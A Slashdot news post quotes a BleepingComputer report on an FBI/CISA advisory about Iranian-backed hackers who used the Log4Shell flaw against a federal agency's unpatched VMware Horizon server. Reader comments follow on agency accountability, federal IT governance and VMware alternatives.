Iranian Hackers Breached Federal Agency Using Log4Shell Exploit (bleepingcomputer.com) 27
An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.
"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.
CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.
"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.
CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.
Crypto mining software (Score:2)
Because the first thing I do when penetrating an adversaries intelligence/law enforcement system is to run something that increases the processing load for no good reason and gets them to take a look at it.
Re: Crypto mining software (Score:4, Funny)
That's what makes this story hilarious though. The Iranians were probably not trying to hack the U.S. government. They might not have even realized that's what they did.
It's like finding out someone broke into a bank to graffiti the vault walls.
Someone should be ashamed of themselves... (Score:3)
The article doesn't reveal the identify of the executive branch federal agency, but holy cow, they should be ashamed of themselves!
An exposed VMware server, not properly segmented from the Internet via a firewall, from which a lateral attack could be mounted on an Active Directory domain server? How, in this day and age, did a configuration like that pass muster? What system owner signed off on it? **What government manager is to blame?**
Re:Someone should be ashamed of themselves... (Score:5, Interesting)
It would make sense for there to be a single federal branch InfoSec oversight organization that does basic vulnerability scans against all federal agencies networks accessible through the Internet. However, every federal system is supposed to have an identified system owner and a plan for making/keeping it secure. Contractors are often employed for grunt work (but not always), but ultimately a government employee is responsible for securing the system. A little light shed on individuals who don't live up to their responsibilities might go a long way towards getting things more sanitized. This has got to be pretty embarrassing for someone, but the names appear to have been redacted to protect them in this case.
Re: Someone should be ashamed of themselves... (Score:2)
Security through legislation is not very effective. Lawmakers need to remove themselves from these decisions by handing over authority to an agency.
Re: (Score:2)
Lawmakers (legislative branch) aren't involved in securing executive branch systems, except at the highest policy level (the US legal code). The executive branch has plenty of governance of its own regarding how IT systems are supposed to be protected/operated. Each executive branch agency has supplemental governance. The US federal branch executive agencies have authority and responsibility for securing their IT systems.
Little detail was provided, but perhaps the kindest interpretation is that VMware s
Re: Someone should be ashamed of themselves... (Score:2)
They are in charge of ways and means though, and dictate how projects need to be bid. It's setup to shovel pork into consultants' pockets. The whole approach to government spending needs to be abandoned for security. Put an organization like the NSA in charge and give them the authority to enforce their recommendations.
Re: (Score:2)
?? Congress (legislative branch) approves spending for executive branch, but doesn't dictate how he money is spent operationally. Executive branch agencies are firmly in charge of how they run themselves, including their IT operations.
The NSA is an executive branch agency itself, and has already been tasked by executive order with protecting federal government computer networks from "cyber-terrorism". On day to day operational issues, each agency has its own IT security function in addition to its IT ope
Re: Someone should be ashamed of themselves... (Score:2)
If Congress doesn't decide how the executive spends its funding, then why doesn't federal funding cover abortion at Planned Parenthood?
Re: (Score:2)
Probably have been. Easy enough to do. The feds that did the scanning might be in the group that isn't going to alert anyone about their vulnerabilities. Future use and all that. Maybe.
Re: (Score:2)
You would be surprised how few people even turn on VCSA backups and expect restores of the appliance to work 100% of the time. Slapping VMWare and vSphere on a chunk of notes attached to a NAS is one thing. Properly administrating it with multiple LUNs/shares with DRS is another. Add onto that doing backups "right" so they can be pulled out and tested.
Re: (Score:2)
Horizon View is their VDI solution. It’s commonly kept open to the internet because it’s a remote access product.
We’re not talking about vcenter or ESXi.
vmware licenseing changes and hardware drops (Score:3)
vmware licensing changes and droping drives for an lot of hardware.
Really stopped an lot of upgrades.
Re: (Score:2)
I don't understand why people use VMWare at all, when there are free alternatives available that work fine.
Re: (Score:2)
Re: (Score:2)
https://www.microsoft.com/en-u... [microsoft.com]
Re: (Score:2)
Please list these free alternatives for ESXi Server.
https://www.microsoft.com/en-u... [microsoft.com]
The free version of Hyper-V server is still at 2019 because MS isn't releasing any more free hypervisor versions of Windows. It's not exactly a winning move to use a product whose end-of-line is already announced. Tangentially, Hyper-V requires a Windows computer to manage unless you're cool doing everything in Powershell; there's no WebUI for it.
I've played around with some of the other alternatives, and I haven't been able to find a viable alternative, either. Oracle makes me scratch my head as they have
Time to bring back (Score:3)
Neocon Cyber Büllshít (Score:1)
unpatched (Score:2)
Is this the agency that manages Govt CIOs? (Score:2)
Most agency CIOs are Senior Executive Service positions (versus regular Civil Service or Political Appointees.) So the agency that manages Govt CIO workforce/positions got hacked? I don't know whether to laugh or cry over that.